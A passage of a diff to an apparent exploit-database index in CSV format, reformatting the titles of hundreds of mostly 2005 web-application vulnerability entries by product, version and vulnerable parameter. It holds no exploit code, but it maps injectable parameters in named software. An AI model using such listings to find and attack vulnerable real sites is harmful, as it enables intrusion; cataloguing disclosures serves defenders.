Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum - 'forumreply.php?TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 -26505,platforms/php/webapps/26505.txt,"Codegrrl - Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 +26505,platforms/php/webapps/26505.txt,"Codegrrl - 'Protection.php' Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe?tsurl' Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 -26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 +26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 26515,platforms/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 @@ -29082,7 +29083,7 @@ id,file,description,date,author,platform,type,port 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - 'subscribers.tracking.edit.php?subtrackingid' SQL Injection",2005-12-14,r0t,php,webapps,0 26830,platforms/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,php,webapps,0 26521,platforms/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps,0 -27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php' st Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 +27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php?st' Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps,0 26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'Unserialize()' Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 @@ -29090,17 +29091,17 @@ id,file,description,date,author,platform,type,port 26533,platforms/jsp/webapps/26533.txt,"Revize CMS - Revize.XML Information Disclosure",2005-11-17,Lostmon,jsp,webapps,0 26534,platforms/jsp/webapps/26534.txt,"Revize CMS HTTPTranslatorServlet - Cross-Site Scripting",2005-11-17,Lostmon,jsp,webapps,0 26535,platforms/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",php,webapps,0 -26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart - Shopadmin.asp HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0 -26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - 'options.php / viewforum.php' SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 +26537,platforms/asp/webapps/26537.html,"VP-ASP Shopping Cart - 'Shopadmin.asp' HTML Injection",2005-11-17,ConcorDHacK,asp,webapps,0 +26538,platforms/php/webapps/26538.txt,"PHP-Fusion 4.0/5.0/6.0 - 'options.php?/ viewforum.php' SQL Injection",2005-11-19,"Robin Verton",php,webapps,0 26539,platforms/php/webapps/26539.txt,"Advanced Poll 2.0.2/2.0.3 - 'popup.php' Cross-Site Scripting",2005-11-21,[GB],php,webapps,0 26541,platforms/php/webapps/26541.txt,"SimplePoll - 'results.php' SQL Injection",2005-11-21,stranger-killer,php,webapps,0 26543,platforms/php/webapps/26543.txt,"APBoard - 'thread.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 -26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection",2005-11-21,Lostmon,php,webapps,0 +26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - 'profile.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - 'mail.php?user' Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - 'Getdox.php' Directory Traversal",2005-11-22,Shell,php,webapps,0 -26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 +26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function 'User' SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple SQL Injections",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 @@ -29118,7 +29119,7 @@ id,file,description,date,author,platform,type,port 26569,platforms/php/webapps/26569.txt,"PHP Labs Survey Wizard - SQL Injection",2005-11-23,r0t,php,webapps,0 26570,platforms/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26571,platforms/php/webapps/26571.txt,"Ezyhelpdesk 1.0 - Multiple SQL Injections",2005-11-23,r0t,php,webapps,0 -26572,platforms/php/webapps/26572.txt,"blogBuddies 0.3 - 'index.php' u Parameter Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 +26572,platforms/php/webapps/26572.txt,"blogBuddies 0.3 - 'index.php?u' Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 26573,platforms/php/webapps/26573.txt,"blogBuddies 0.3 - 'magpie_debug.php?url' Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 26574,platforms/php/webapps/26574.txt,"blogBuddies 0.3 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2005-11-23,gb.network,php,webapps,0 26576,platforms/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injections",2005-11-23,r0t3d3Vil,php,webapps,0 @@ -29146,13 +29147,13 @@ id,file,description,date,author,platform,type,port 26602,platforms/php/webapps/26602.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'send.php?messageid' SQL Injection",2005-11-28,r0t,php,webapps,0 26603,platforms/php/webapps/26603.txt,"Enterprise Heart Enterprise Connector 1.0.2 - 'messages.php?messageid' SQL Injection",2005-11-28,r0t,php,webapps,0 26604,platforms/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 -26605,platforms/php/webapps/26605.txt,"Babe Logger 2.0 - 'index.php' gal Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26605,platforms/php/webapps/26605.txt,"Babe Logger 2.0 - 'index.php?gal' SQL Injection",2005-11-28,r0t,php,webapps,0 26606,platforms/php/webapps/26606.txt,"Babe Logger 2.0 - 'comments.php?id' SQL Injection",2005-11-28,r0t,php,webapps,0 26607,platforms/php/webapps/26607.txt,"Top Music Module 3.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26608,platforms/php/webapps/26608.txt,"phpWordPress 3.0 - Multiple SQL Injections",2005-11-28,r0t,php,webapps,0 26609,platforms/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,php,webapps,0 26610,platforms/php/webapps/26610.txt,"Bedeng PSP 1.1 - 'download.php?a.ngroup' SQL Injection",2005-11-28,r0t,php,webapps,0 -26611,platforms/php/webapps/26611.txt,"Bedeng PSP 1.1 - 'index.php' a.nsub Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26611,platforms/php/webapps/26611.txt,"Bedeng PSP 1.1 - 'index.php?a.nsub' SQL Injection",2005-11-28,r0t,php,webapps,0 26612,platforms/php/webapps/26612.txt,"Nelogic Nephp Publisher 4.5.2 - SQL Injection",2005-11-28,r0t,php,webapps,0 26613,platforms/php/webapps/26613.txt,"Softbiz Resource Repository Script - 'details_res.php?sbres_id' SQL Injection",2005-11-28,r0t,php,webapps,0 26614,platforms/php/webapps/26614.txt,"Softbiz Resource Repository Script - 'showcats.php?sbcat_id' SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -29167,8 +29168,8 @@ id,file,description,date,author,platform,type,port 26625,platforms/php/webapps/26625.txt,"EdmoBBS 0.9 - SQL Injection",2005-11-28,r0t,php,webapps,0 26626,platforms/php/webapps/26626.txt,"UGroup 2.6.2 - 'forum.php?FORUM_ID' SQL Injection",2005-11-28,r0t,php,webapps,0 26627,platforms/php/webapps/26627.txt,"UGroup 2.6.2 - 'topic.php' Multiple SQL Injections",2005-11-28,r0t,php,webapps,0 -26628,platforms/php/webapps/26628.txt,"ShockBoard 3.0/4.0 - Offset Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 -26629,platforms/php/webapps/26629.txt,"Netzbrett 1.5.1 - P_Entry Parameter SQL Injection",2005-11-28,r0t,php,webapps,0 +26628,platforms/php/webapps/26628.txt,"ShockBoard 3.0/4.0 - 'Offset' SQL Injection",2005-11-28,r0t,php,webapps,0 +26629,platforms/php/webapps/26629.txt,"Netzbrett 1.5.1 - 'P_Entry' SQL Injection",2005-11-28,r0t,php,webapps,0 26630,platforms/php/webapps/26630.txt,"ADC2000 NG Pro 1.2 - SQL Injection",2005-11-28,r0t,php,webapps,0 26631,platforms/php/webapps/26631.txt,"Simple Document Management System 2.0 - 'list.php?folder_id' SQL Injection",2005-11-28,r0t,php,webapps,0 26632,platforms/php/webapps/26632.txt,"Simple Document Management System 2.0 - 'messages.php?mid' SQL Injection",2005-11-28,r0t,php,webapps,0 @@ -29184,7 +29185,7 @@ id,file,description,date,author,platform,type,port 26642,platforms/php/webapps/26642.txt,"GuppY 4.5 - 'nwlmail.php?lng' Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,php,webapps,0 26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 (Multiple Products) - Cross-Site Scripting",2005-11-28,r0t,php,webapps,0 -26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 - default.asp SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 +26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 - 'default.asp' SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 26646,platforms/php/webapps/26646.txt,"PHP Upload Center - 'index.php' Directory Traversal",2005-11-29,liz0,php,webapps,0 26647,platforms/php/webapps/26647.txt,"Fantastic Scripts Fantastic News 2.1.1 - 'news.php' SQL Injection",2005-11-29,r0t3d3Vil,php,webapps,0 26649,platforms/php/webapps/26649.txt,"DMANews 0.9 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 @@ -29198,7 +29199,7 @@ id,file,description,date,author,platform,type,port 26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 - 'blog.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 - 'Ringmaker.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26659,platforms/php/webapps/26659.txt,"FAQ System 1.1 - 'viewFAQ.php' Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 -26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php' category_id Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 +26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php?category_id' SQL Injection",2005-11-29,r0t,php,webapps,0 26661,platforms/php/webapps/26661.txt,"Survey System 1.1 - 'survey.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection",2005-11-29,KingOfSka,php,webapps,0 26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 @@ -29209,7 +29210,7 @@ id,file,description,date,author,platform,type,port 26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'buyoffers.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'products.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 26672,platforms/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 - 'profiles.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 -26673,platforms/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - 'index.php' cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26673,platforms/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - 'index.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 26674,platforms/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - 'faq_qanda.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 - 'refer_friend.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - 'print_article.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 @@ -29239,7 +29240,7 @@ id,file,description,date,author,platform,type,port 26701,platforms/asp/webapps/26701.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26702,platforms/asp/webapps/26702.txt,"ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26704,platforms/asp/webapps/26704.txt,"Solupress News 1.0 - 'search.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 -26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 - Archive.asp Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 +26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 - 'Archive.asp' Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 - 'messages.php' SQL Injection",2005-12-03,"Nolan West",php,webapps,0 26707,platforms/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps,0 26713,platforms/php/webapps/26713.txt,"PHPYellowTM 5.33 - 'search_result.php?haystack' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 @@ -29260,16 +29261,16 @@ id,file,description,date,author,platform,type,port 26728,platforms/php/webapps/26728.txt,"Web4Future Portal Solutions - 'Comentarii.php' SQL Injection",2005-12-05,r0t,php,webapps,0 26729,platforms/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 - 'functions.php' SQL Injection",2005-12-05,r0t,php,webapps,0 26730,platforms/php/webapps/26730.txt,"Web4Future Portal Solutions - 'Arhiva.php' Directory Traversal",2005-12-05,r0t,php,webapps,0 -26731,platforms/php/webapps/26731.txt,"Blog System 1.2 - 'index.php' cat Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 +26731,platforms/php/webapps/26731.txt,"Blog System 1.2 - 'index.php?cat' SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 26732,platforms/php/webapps/26732.txt,"Edgewall Software Trac 0.7.1/0.8/0.9 Search Module - SQL Injection",2005-12-05,anonymous,php,webapps,0 26734,platforms/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 26735,platforms/php/webapps/26735.txt,"vBulletin vBShout Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 26736,platforms/hardware/webapps/26736.txt,"Zoom Telephonics X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0 27634,platforms/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,php,webapps,0 -26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 - Password.asp Cross-Site Scripting",2005-12-06,Dj_Eyes,asp,webapps,0 -26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 - KB.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 +26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 - 'Password.asp' Cross-Site Scripting",2005-12-06,Dj_Eyes,asp,webapps,0 +26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 - 'KB.asp' Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 26744,platforms/asp/webapps/26744.txt,"NetAuctionHelp 3.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-06,r0t,asp,webapps,0 -26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - search.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 +26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - 'search.asp' Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - 'faqDspItem.asp?faqid' SQL Injection",2005-12-06,r0t,asp,webapps,0 26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2005-12-06,r0t,asp,webapps,0 26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x - 'connector.php' Directory Traversal",2005-12-06,rgod,php,webapps,0 @@ -29282,15 +29283,15 @@ id,file,description,date,author,platform,type,port 26759,platforms/asp/webapps/26759.txt,"ASPMForum - 'forum.asp?baslik' SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26760,platforms/asp/webapps/26760.txt,"ASPMForum - 'kullanicilistesi.asp?harf' SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26761,platforms/cgi/webapps/26761.txt,"Dell TrueMobile 2300 - Remote Credential Reset",2005-12-07,TNull,cgi,webapps,0 -26763,platforms/cfm/webapps/26763.txt,"Magic List Pro - view_archive.cfm ListID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 -26764,platforms/cfm/webapps/26764.txt,"Magic Forum Personal - view_forum.cfm ForumID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 +26763,platforms/cfm/webapps/26763.txt,"Magic List Pro - 'view_archive.cfm?ListID' SQL Injection",2005-12-08,r0t,cfm,webapps,0 +26764,platforms/cfm/webapps/26764.txt,"Magic Forum Personal - 'view_forum.cfm?ForumID' SQL Injection",2005-12-08,r0t,cfm,webapps,0 26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal - 'view_thread.cfm' Multiple SQL Injections",2005-12-08,r0t,cfm,webapps,0 26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 -26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - index.cfm Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0 +26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - 'index.cfm' Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0 26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - 'register.php' Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0 -26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - Book.cfm Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 -26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.asp Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 +26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - 'Book.cfm' Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 +26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - 'SearchDB.asp' Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 26778,platforms/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 26780,platforms/php/webapps/26780.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-QuickSearch.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 26781,platforms/php/webapps/26781.txt,"Scout Portal Toolkit 1.3.1 - 'SPT-BrowseResources.php' Cross-Site Scripting",2005-12-12,Preddy,php,webapps,0 @@ -29305,10 +29306,10 @@ id,file,description,date,author,platform,type,port 26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 -26793,platforms/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php' id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 +26793,platforms/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php?id' SQL Injection",2005-12-13,r0t,php,webapps,0 26794,platforms/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-13,r0t,php,webapps,0 26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x - 'search.php?by' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 -26796,platforms/php/webapps/26796.txt,"VCD-db 0.9x Search Module - batch Parameter Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 +26796,platforms/php/webapps/26796.txt,"VCD-db 0.9x Search Module - 'batch' Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 26797,platforms/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 26799,platforms/php/webapps/26799.txt,"Snipe Gallery 3.1.4 - 'view.php?gallery_id' SQL Injection",2005-12-13,r0t,php,webapps,0 @@ -29318,9 +29319,9 @@ id,file,description,date,author,platform,type,port 26804,platforms/php/webapps/26804.txt,"WordPress Plugin Spicy Blogroll - Local File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 26807,platforms/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps,0 -26808,platforms/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - 'index.php' language Parameter Traversal Local File Inclusion",2005-12-13,r0t,php,webapps,0 +26808,platforms/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - 'index.php?language' Traversal Local File Inclusion",2005-12-13,r0t,php,webapps,0 26809,platforms/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 - 'show.php' Multiple SQL Injections",2005-12-13,r0t,php,webapps,0 -26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php' album Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 +26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php?album' SQL Injection",2005-12-13,r0t,php,webapps,0 26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - 'Advertiser_statistic.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 @@ -29328,7 +29329,7 @@ id,file,description,date,author,platform,type,port 26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0 26818,platforms/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,php,webapps,0 26819,platforms/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,php,webapps,0 -26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum - forum.asp Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0 +26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum - 'forum.asp' Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0 26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 - 'topic.asp?TID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 - 'forum.asp?FORUM_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26823,platforms/asp/webapps/26823.txt,"ASPBB 0.4 - 'profile.asp?PROFILE_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 @@ -29336,15 +29337,15 @@ id,file,description,date,author,platform,type,port 26826,platforms/php/webapps/26826.txt,"Netref 3.0 - 'index.php' SQL Injection",2005-12-14,syst3m_f4ult,php,webapps,0 26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - 'tracking.details.php?trackingid' SQL Injection",2005-12-14,r0t,php,webapps,0 26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 - 'sales.view.php?customerid' SQL Injection",2005-12-14,r0t,php,webapps,0 -26836,platforms/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - 'index.php' _SERVER[REMOTE_ADDR] Parameter Cross-Site Scripting",2005-12-14,rgod,php,webapps,0 +26836,platforms/php/webapps/26836.txt,"Limbo CMS 1.0.4.2 - 'index.php?_SERVER[REMOTE_ADDR]' Cross-Site Scripting",2005-12-14,rgod,php,webapps,0 26837,platforms/php/webapps/26837.txt,"Limbo CMS 1.0.4.2 - 'option' Traversal Arbitrary File Access",2005-12-14,rgod,php,webapps,0 -26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php' page Parameter Cross-Site Scripting",2005-12-15,B3g0k,php,webapps,0 -26839,platforms/php/webapps/26839.txt,"TML 0.5 - 'index.php' form Parameter Cross-Site Scripting",2005-12-15,X1ngBox,php,webapps,0 -26840,platforms/php/webapps/26840.txt,"TML 0.5 - 'index.php' id Parameter SQL Injection",2005-12-15,X1ngBox,php,webapps,0 +26838,platforms/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php?page' Cross-Site Scripting",2005-12-15,B3g0k,php,webapps,0 +26839,platforms/php/webapps/26839.txt,"TML 0.5 - 'index.php?form' Cross-Site Scripting",2005-12-15,X1ngBox,php,webapps,0 +26840,platforms/php/webapps/26840.txt,"TML 0.5 - 'index.php?id' SQL Injection",2005-12-15,X1ngBox,php,webapps,0 26841,platforms/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,php,webapps,0 26842,platforms/cgi/webapps/26842.txt,"Sitenet BBS 2.0 - 'netboardr.cgi' Multiple Cross-Site 